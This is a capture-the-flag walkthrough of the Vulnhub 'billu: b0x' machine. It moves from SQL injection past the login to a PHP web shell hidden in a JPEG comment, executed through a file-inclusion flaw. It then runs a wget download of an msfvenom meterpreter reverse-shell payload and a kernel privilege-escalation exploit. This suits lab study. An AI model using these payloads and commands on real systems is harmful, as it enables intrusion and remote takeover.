Welcome Everyone.

Today we are solving the billu: b0x CTF. I found the name interesting so why not?
Vulnhub link: https://www.vulnhub.com/entry/billu-b0x,188/

Let’s get started.

First and foremost we have to discover the ip of the machine…  We are running the command: nmap -sT 192.168.56.0/24
We can see the results in the following picture

 

 

Super Obviously step we are typing on our browser 192.168.56.107 to check what page exists in the http server (if exists any).
Ok. I typed the address and I came to find this:

This was my first reaction:

 

After half an hour of false attempts I got bored and I thought that the sqli might be somewhere else, or it was just a trick for the creator to troll us.

I fired up nikto and found some interesting things. test.php was the first file that I checked on my browser… the file parameter does not exist… interesting.

I tried to do the trick like: http://192.168.56.107/test.php?file=asddsa But it did not work. It took me 5 mins to understand the trick… It was the type of request… I was trying a GET request but it required a POST request to work. I opened burp (Actually it was already open) and I tried it.

We have the following results:

 

 

 

Now we have to explore the system for a piece of information that will give us access to the machine.

I checked the index.php which was the only file that I was sure that it actually existed and I found some interesting lines of code:

if(isset($_POST[‘login’]))
{
$uname=str_replace(‘\”,”,urldecode($_POST[‘un’]));
$pass=str_replace(‘\”,”,urldecode($_POST[‘ps’]));
$run=’select * from auth where  pass=\”.$pass.’\’ and uname=\”.$uname.’\”;
$result = mysqli_query($conn, $run);
if (mysqli_num_rows($result) > 0) {

$row = mysqli_fetch_assoc($result);
echo “You are allowed<br>”;
$_SESSION[‘logged’]=true;
$_SESSION[‘admin’]=$row[‘username’];

header(‘Location: panel.php’, true, 302);

}
else
{
echo “<script>alert(‘Try again’);</script>”;
}

}

 

Those are actually the lines that are interesting:

$uname=str_replace(‘\”,”,urldecode($_POST[‘un’]));
$pass=str_replace(‘\”,”,urldecode($_POST[‘ps’]));
$run=’select * from auth where  pass=\”.$pass.’\’ and uname=\”.$uname.’\”;

It strips only one specific character: ‘ So the plan is to break the quote from the inside… if we use \ at the end of the word we are putting on the field the quote will not close and we will have the following result:

$run=’select * from auth where  pass=\’‘test\’\’ and uname=\” or  1=1 –‘\”;
The bold letters are in quotes… Server will see those letters as strings
So we need to execute our payload.

pass: test\
username: or 1=1–

It is on

We can see from the following picture that we took access to website panel.

 

We have the following options: 1) we can see the existing users. 2) We can create a user…

We have the ability to create a user and upload an image. We will try to upload a shell via the image upload.

We need a shell to upload. We are going to generate one with weevely. Wrong… for some reason the tool broke and I am not going to fix it now, we are going to create our own simple shell..

I created a file named shell.php and I wrote the following code in it:

<?php

echo system($_GET[“c”]);

?>

Simple… now we are going to try uploading it.. FAIL!!! 😛

What if we inject the shell code in a jpg file and the display the jpg file via the LFI vulnerability. Would we be able to execute our code?  Lets find out.

I injected the image with our shell code using gimp and I uploaded successfully to the server. Unfortunately when I tried to run the php code the coded did not execute. I need to find another way.
We can see the following pictures how I injected the shell code as comment and how it failed to execute…

Notice:You can inject code or other data to an image by putting it as comment. Comments created for images so authors can keep some short info for their creations. Gimp is a simple tool that gives you the ability to put comments to an image

 

 


Hmm… Lets examine the code of the panel.php before we continue with exploitation. We may find something useful. Yep… I was Right

Look at that piece of code: (panel.php)

if(isset($_POST[‘continue’]))
{
$dir=getcwd();
$choice=str_replace(‘./’,”,$_POST[‘load’]);

if($choice===’add’)
{
include($dir.’/’.$choice.’.php’);
die();
}

if($choice===’show’)
{

include($dir.’/’.$choice.’.php’);
die();
}
else
{
include($dir.’/’.$_POST[‘load’]);

 }

}

The last else could cause damage to the system. It is an RCE because of the include… We have our code in the image and now we are going to execute it ? I did it via burp suite because of the POST request which is required…

My computer restarted almost without reason… anyway Let’s continue the walkthrough…  For some reason… I can only see the image jack.jpg with the previous exploit… So I downloaded that specific image, injected the code to that image and re-uploaded to the server (I do not know why I could not see the other images). A thing that I noticed… the system,exec shell_exec and some other commands are disabled… the only command that worked for me was passthru
I changed the injected code to :<?php passthru($_GET[“c”]); ?> and everything worked fine

 

Now that we can execute commands to the server we can create a quick payload download it and execute it to the server… My money is on meterpreter 😛

I generated the payload with the following command: msfvenom -p linux/x86/meterpreter/reverse_tcp -f elf lhost=192.168.1.18 lport=4444 -a x86 –platform linux -o /var/www/html/payload

I started the apache and after /exploit/multi/handler in metasploit.

 

I use the /tmp path to download the paylaod to the server because it is more likely to be a writable folder and the following command to download the payload to the server.
wget+-O/tmp/payload+http://192.168.1.18/payload

Notice: I forgot to change my eth0 ip to 192.168.56.x so it can be on the same network with the virtual box (host-only) which lead me to looking for half an hour why I was getting a host unreachable message when I was using wget… The only thing that I did to make it work was to do a: sudo ifconfig eth0 192.168.56.5 up and run again the previous command to download the file… With the correct ip of course (wget+-O/tmp/payload+http://192.168.56.5/payload) Oh almost forgot. I also re-generated the payload with the correct ip (192.168.56.5) and I set the lhost of multi/handler to 192.168.56.5. Actually I changed my local ip to 192.168.56.5 so the virtual box can communicate back to me 🙂

The only thing that left now is to execute the payload 🙂
I gave rwx permissions using the command:
chmod+u=rwx+/tmp/payload
And I executed it with the command: /tmp/payload
Now we have meterpreter access to the system 🙂

We are in but we need to get r00t

By typing sysinfo in the meterpreter we can see that it is running on ubuntu 12.04 pretty old… I searched in google for privilege escalation exploit and I found this one:
https://www.exploit-db.com/exploits/37292/
I downloaded the exploit, compiled it and here we are root 😛

Thank everyone I hope you had some good time 😛